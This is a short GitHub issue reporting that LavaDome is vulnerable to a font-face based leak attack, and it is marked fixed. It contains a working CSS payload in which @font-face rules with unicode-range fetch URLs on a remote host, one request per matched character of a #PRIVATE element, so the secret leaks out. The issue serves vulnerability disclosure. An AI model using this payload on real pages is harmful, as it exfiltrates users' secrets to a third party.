LavaMoat/LavaDome

LavaDome is vulnerable to font-face based leak attack

Closed this issue · 1 comments

Based on @masatokinugawa's research (introduced to me by @mhofman), the following attack can exfiltrate relevant chars of the secret (with order most of the time) to a remote server when added to the demo app:

<style>
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:A');
        unicode-range:U+0041;
    }
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:B');
        unicode-range:U+0042;
    }
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:C');
        unicode-range:U+0043;
    }
    #PRIVATE{
        font-family:attack;
    }
</style>

fixed #17